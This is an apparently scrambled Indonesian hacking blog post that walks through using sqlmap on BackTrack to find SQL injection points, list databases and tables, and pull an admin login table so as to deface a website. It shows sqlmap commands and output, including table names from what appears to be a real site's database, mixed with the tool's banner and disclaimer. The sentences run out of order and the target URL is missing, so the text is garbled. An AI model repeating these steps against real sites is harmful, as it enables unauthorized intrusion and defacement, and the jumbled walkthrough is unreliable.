Web application technology: Apache, PHP 5.3.The correct way to avoid SQL injection attacks, no matter which database you use, is to separate the data from SQL, so that data stays data and will never be interpreted as commands by the SQL parser. #./sqlmap.py -u -D pwwebho_claforms -T ft_accounts -columns Ok ternyata ada table "ft_accounts" di situ, langsung aja (ini dalam kasus saya mungkin dalam kasus anda akan berbeda, jadi tingkatkanlah ilmu kira-kira sobat, hahaa) | ft_module_swift_mailer_email_template_fields | ft_module_submission_accounts_view_override | ft_email_template_edit_submission_views retrieved: ft_module_swift_mailer_email_template_fields retrieved: ft_module_submission_accounts_view_override retrieved: ft_module_submission_accounts_menus retrieved: ft_module_submission_accounts_data retrieved: ft_module_submission_accounts fetching tables for database: 'pwwebho_claforms' sqlmap.py -u -D pwwebho_claforms -tables Setelah ketemu pilih database yg kira" ada table login admin, dalam contoh kali ini saya pilih "pwwebho_claforms", lanjut. fetched data logged to text files under '/pentest/database/sqlmap/output/' Web application technology: Apache, PHP 5.3.17 Title: MySQL > 5.0.11 AND time-based blind Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Title: AND boolean-based blind - WHERE or HAVING clause Sqlmap identified the following injection points with a total of 0 HTTP(s) requests: Authors assume no liability and are not responsible for any misuse or damage caused by this program It is the end user's responsibility to obey all applicable local, state and federal laws.
legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
Sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool Karna disinii toolsnya lengkap kalo tantang hackingĪto bisa juga lewat menu (alt + f1) backtrack => exploitation tool => web explotation tool => sqlmap OK sesuai dengan judul di atas saya akan share cara deface sebuah web dengan menggunakan tool Sqlmap, disini saya menggunakan OS Backtrack si naga hacking hehee, Banyak teman-teman saya yang minta ingin belajar deface pakaii sqlmap inii.
0 kommentar(er)
